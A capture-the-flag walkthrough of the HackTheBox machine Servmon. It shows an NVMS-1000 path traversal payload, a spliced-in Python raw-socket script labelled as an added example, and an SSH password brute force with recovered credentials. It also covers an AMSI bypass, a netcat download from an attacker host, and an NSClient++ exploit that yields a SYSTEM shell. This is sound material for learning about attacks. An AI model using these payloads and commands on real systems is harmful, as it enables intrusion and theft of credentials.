
Servmon

Personal Rating: Medium

Enumeration

sudo nmap -sV -sC -p- <IP>

21/tcp    open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  06:35PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
80/tcp    open  http
|_http-title: Site doesn't have a title (text/html).
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5666/tcp  open  tcpwrapped
6063/tcp  open  tcpwrapped
6699/tcp  open  napster?
8443/tcp  open  ssl/https-alt
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     iday
|     :Saturday
|     workers
|_    jobs
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC

That is a lot of output. It is clearly a Windows host (Microsoft ftpd, OpenSSH for Windows, SMB on 139/445): anonymous FTP exposes a Users directory, port 80 serves a web application that immediately redirects to Pages/login.htm, and 8443 is the NSClient++ web interface behind a self-signed certificate for localhost that expired in January 2021. Ports 5666 and 6063 report tcpwrapped, which means the TCP handshake completed but the service closed the connection before nmap could probe it; that is typical for services that filter by source address.

21 ftp:

Anonymous login is allowed. The Users directory holds Users/Nadine/Confidential.txt and Users/Nathan/"Notes to do.txt". Confidential.txt talks about a Passwords.txt file that should be moved back into a secure folder, and the to-do list mentions moving the secret files into SharePoint.

80 http:

The redirect target Pages/login.htm is the NVMS-1000 login page. Directory brute forcing turned up nothing:

feroxbuster -u http://10.10.10.184/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt #No results

NVMS-1000 has a well-known directory traversal. The payload is very simple: /../../../../../../../../../../../../windows/win.ini But it did not work when entered in the browser.

8443 https:

NSClient++ web interface (from the nmap http-title). The certificate is self-signed, so feroxbuster needs -k to ignore TLS errors:

feroxbuster -u https://10.10.10.184:8443/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -k

5666:

Likely NRPE (Nagios), which is what NSClient++ speaks on this port; tcpwrapped fits an NRPE listener that only accepts its configured allowed hosts.

There are many Nagios and NSClient++ exploits according to searchsploit, so the next step is to find out the exact version.

6699:

nmap printed napster? with a question mark, so this is only a port-number guess without a matching banner. Possibly WinMX or napster.

NVMS LFI

Confidential.txt mentions a Passwords.txt file, so the NVMS traversal should be able to read it even though the first attempt did not work.

The Metasploit version of the exploit (auxiliary/scanner/http/nvms_traversal) worked. But why?

Comparing what Metasploit sent with what the browser sent showed that the browser had stripped the ../ segments from the URL before sending the request ;_; Browsers (and most HTTP client libraries) normalise dot segments, so /../../windows/win.ini turns into /windows/win.ini and never reaches NVMS as a traversal. The payload only works when the request path is sent byte for byte, for example with curl --path-as-is, with a raw socket, or with a module that builds the request line itself.
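The following Python script is an added example, not code from the writeup or from the Metasploit module. It demonstrates both halves of the observation above: what a browser does to the traversal before sending it, and how to send the request line unmodified with a raw socket so that ../ survives. The target address, port and the win.ini path are taken from the scan above; replace the path with the file Confidential.txt points at (an assumption, not a value from the page).

```python
"""
Added example: why '../' vanished in the browser, and how to send it raw.
Target host/port are the writeup's; the traversal target is assumed.
"""
import posixpath
import socket

TARGET_HOST = "10.10.10.184"
TARGET_PORT = 80
# Same payload as in the writeup: twelve '../' then the file to read.
TRAVERSAL = "../" * 12 + "windows/win.ini"


def browser_normalized_path(path: str) -> str:
    """Approximate what a browser or an HTTP library does to a request path
    before it leaves the client: resolve '.' and '..' segments.  Because the
    path is rooted at '/', every leading '..' is simply discarded, so the
    traversal collapses into a harmless absolute path."""
    if not path.startswith("/"):
        path = "/" + path
    return posixpath.normpath(path)


def build_raw_request(path: str, host: str) -> bytes:
    """Hand-build an HTTP/1.1 GET so the request line is sent verbatim,
    the way the Metasploit module and curl --path-as-is do."""
    if not path.startswith("/"):
        path = "/" + path
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: Mozilla/5.0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


def split_response(raw: bytes):
    """Split a raw HTTP response into (status_code, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0]
    return int(status_line.split()[1]), body


def fetch_raw(path: str, host: str = TARGET_HOST, port: int = TARGET_PORT,
              timeout: float = 5.0):
    """Send the unnormalised request over a plain TCP socket and return
    (status, body).  Connection: close lets us read until EOF."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_raw_request(path, host))
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return split_response(b"".join(chunks))


if __name__ == "__main__":
    print("browser would request :", browser_normalized_path(TRAVERSAL))
    print("raw socket requests   :",
          build_raw_request(TRAVERSAL, TARGET_HOST).split(b"\r\n")[0].decode())
    status, body = fetch_raw(TRAVERSAL)
    print(status)
    print(body.decode(errors="replace"))
```

The equivalent one-liner is curl --path-as-is http://10.10.10.184/../../../../../../../../../../../../windows/win.ini; without --path-as-is curl normalises the path exactly like the browser did.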

The resulting file contained 7 passwords. I will try all of them against nathan and nadine on SSH; userlist.txt holds both names in lower-case and capitalised spelling (the l:4 below) and the password list is the loot file Metasploit saved. Using hydra makes that faster:

hydra -L userlist.txt -P 20231211170419_default_10.10.10.184_nvms.traversal_767567.txt 10.10.10.184 ssh

Hydra (
https://github.com/vanhauser-thc/thc-hydra
) starting at 2023-12-11 17:08:57
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 28 login tries (l:4/p:7), ~2 tries per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184 login: nadine password: L1k3B1gBut7s@W0rk
[22][ssh] host: 10.10.10.184 login: Nadine password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 2 valid passwords found

Internal Enumeration

So I could log in with nadine over SSH. nadine has no special privileges.

I transferred winpeasx64.exe onto the host with a Python web server on my side and wget in PowerShell (an alias of Invoke-WebRequest) on the target, and ran it.

It actually seems like Defender blocked WinPEAS:

Program 'winpeas.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted software

Access to the command systeminfo is also denied.

Since evil-winrm has a built-in AMSI bypass (Bypass-4MSI), I will try that.

evil-winrm -i 10.10.10.184 -u nadine -p 'L1k3B1gBut7s@W0rk'

This did work. In ‘Program Files’ you can see ‘Windows Defender Advanced Threat Protection’, which explains why the tooling is being blocked.

searchsploit lists an entry that might work: NSClient++ 0.5.2.35 - Privilege Escalation (/usr/share/exploitdb/exploits/windows/local/46802.txt).

According to the exploit entry, I can grab the Password from C:\Program Files\NSClient++\nsclient.ini:

password = ew2x6SsGTxjRwXOT

This also worked: .\nscp.exe web password --display

Let's see if the password is reused for SSH as root. Nope. Also not for Nathan.

Running the exploit remotely against 10.10.10.184:8443: with the Python version I get a 403, and the Metasploit version reports that the admin password is wrong.

Privilege Escalation

Using auxiliary/scanner/ssh/ssh_login I got a Metasploit session with nadine:L1k3B1gBut7s@W0rk.

I was about to set up dynamic port forwarding to the host, but netstat -ano suggested that I should be able to reach the application directly.

Watching Ippsec's video, since I was stuck here, I found out that the only reason I could not use the website on port 8443 properly was that it only works in Chromium ;_;

So the exploit should now be possible. Logging in with ew2x6SsGTxjRwXOT still did not work: the page shows 403.

The Python version of the exploit did not work either.

With SSH local port forwarding it worked, so the application is not reachable from outside: NSClient++ only serves the web interface to the addresses listed under allowed hosts in nsclient.ini, which here is the host itself. The 403 from the remote attempts is that restriction, not a wrong password.

The Metasploit module windows/http/nscp_authenticated_rce got further through the tunnel but did not return a shell.

It looks like I have to do the exploit manually to make it work.

xtizi's exploit.py (https://github.com/xtizi/NSClient-0.5.2.35---Privilege-Escalation) seems to work with the SSH local port forward set up, but nc.exe did not run: the transferred file appeared corrupted. The transfer was done with wget -UseBasicParsing -OutFile nc64.exe http://10.10.16.6:8000/nc64.exe. When a transferred binary misbehaves, compare Get-FileHash on the target with sha256sum on the attacking machine before blaming the exploit.

python3 exploit.py 'cmd.exe /c "C:\Users\Nadine\Documents\evil.bat"' https://127.0.0.1:8443 ew2x6SsGTxjRwXOT

Another attempt worked. Got it! NSClient++ runs as LocalSystem, so the callback is a SYSTEM shell.


Last updated 1 year ago
